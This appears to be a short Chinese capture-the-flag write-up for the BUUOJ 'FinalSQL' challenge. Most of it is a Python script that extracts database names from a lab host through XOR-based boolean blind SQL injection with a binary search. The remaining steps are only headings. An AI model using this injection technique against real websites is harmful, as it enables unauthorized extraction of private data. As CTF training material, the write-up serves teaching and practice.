FinalSQL

有id参数,长着就像盲注。

exp:

import requests


if __name__ == "__main__":
    string = ""
    for i in range(1, 256):
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            ch = chr(mid)
            sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
            url = f'http://a10fc172-5571-460a-9f76-93eb2e9486fd.node3.buuoj.cn/search.php?id={sql}'
            # print(url)
            response = requests.get(url)
            if response.text.find("NO! Not t") == -1:
                right = mid
            else:
                left = mid + 1
            mid = (left + right) // 2
        string += chr(mid)
        print(string)

爆库名

爆表名

爆字段

拿flag

然后发现爆错表了2333......

PreviousBabySQLNextRCE ME

Last updated